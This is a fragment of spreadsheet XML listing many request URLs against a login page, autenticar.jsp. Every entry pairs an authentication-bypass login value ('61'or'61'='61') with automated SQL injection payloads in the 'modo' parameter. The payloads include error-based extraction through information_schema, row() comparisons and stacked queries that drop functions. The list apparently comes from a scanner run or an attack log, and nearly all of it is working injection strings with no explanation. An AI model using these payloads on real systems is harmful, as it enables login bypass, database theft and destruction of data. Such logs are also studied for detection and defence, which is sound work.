    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));if((3940=3940),select3940,dropfunctionitac);--and((("dluh"="dluh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));if((8242=3066),select8242,dropfunctionjwhk);--and((("hxqo"="hxqo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";if((385=188),select385,dropfunctionljwc);--and"rnih"="rnih</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";if((3940=3940),select3940,dropfunctionitac);--and"mydx"="mydx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";if((7072=3648),select7072,dropfunctionfrjo);--and"vxec"="vxec</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");if((6626=8967),select6626,dropfunctiondwsw);--and("jgda"like"jgda</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");if((3940=3940),select3940,dropfunctionitac);--and("pnin"like"pnin</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar");if((8832=3639),select8832,dropfunctionfpsk);--and("eoxx"like"eoxx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));if((1196=25),select1196,dropfunctionpkin);--and(("vpvj"like"vpvj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));if((3940=3940),select3940,dropfunctionitac);--and(("qkts"like"qkts</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"));if((2559=3940),select2559,dropfunctionvmmd);--and(("jdeq"like"jdeq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));if((819=9749),select819,dropfunctionpzjf);--and((("stmd"like"stmd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));if((3940=3940),select3940,dropfunctionitac);--and((("fthy"like"fthy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")));if((150=8286),select150,dropfunctionpnzt);--and((("jxbi"like"jxbi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";if((3996=1570),select3996,dropfunctiondggl);--and"acxx"like"acxx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";if((3940=3940),select3940,dropfunctionitac);--and"ewme"like"ewme</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar";if((3440=8964),select3440,dropfunctionherx);--and"cydt"like"cydt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(5445=5445</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and((1775=1775</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(((3395=3395</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and('jffu'='jffu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(('nwpa'='nwpa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and((('iftm'='iftm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'dsij'='dsij</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and('twad'like'twad</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(('mcfn'like'mcfn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and((('jsmv'like'jsmv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'vizp'like'vizp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and("xpcs"="xpcs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(("rlzz"="rlzz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and((("uumv"="uumv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and"omzj"="omzj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and("xcha"like"xcha</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(("bnmk"like"bnmk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and((("fqbd"like"fqbd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and(select5591from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5591=5591)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and"zvpb"like"zvpb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)and(8985=8985</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)and((5286=5286</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)and(((6807=6807</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarandrow(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)and('aebh'='aebh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)and(('qvav'='qvav</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)and((('fwcc'='fwcc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)and'tfxn'='tfxn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)and('hied'like'hied</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)and(('uysj'like'uysj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)and((('wecb'like'wecb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)and'eobb'like'eobb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)and("zzcc"="zzcc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)and(("whtm"="whtm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)and((("jnjc"="jnjc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)and"tkde"="tkde</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)and("amcc"like"amcc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)and(("kacv"like"kacv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)and((("xkkk"like"xkkk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"androw(5759,977)&gt;(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5759=5759)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrom(select5759unionselect977)agroupbyxlimit1)and"uycj"like"uycj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7558</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8493)or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5677</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3435')or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2891</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-671'or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6383</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7290"or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5269</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6169)or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(6202=6202</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7023</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4090))or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and((2525=2525</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5823</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5201)))or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(((57=57</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3320</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6451or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2567</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4438')or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and('kigj'='kigj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4434</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2333'))or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(('suoa'='suoa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3306</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8568')))or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and((('thnp'='thnp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8804</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6766'or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'sjfm'='sjfm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7075</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4700')or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and('fiof'like'fiof</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4802</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5304'))or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and(('xdii'like'xdii</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3353</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9404')))or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and((('shcp'like'shcp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-74</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6762'or(select9932from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(9932=9932)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)and'gwjf'like'gwjf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9530</t>
  </si>
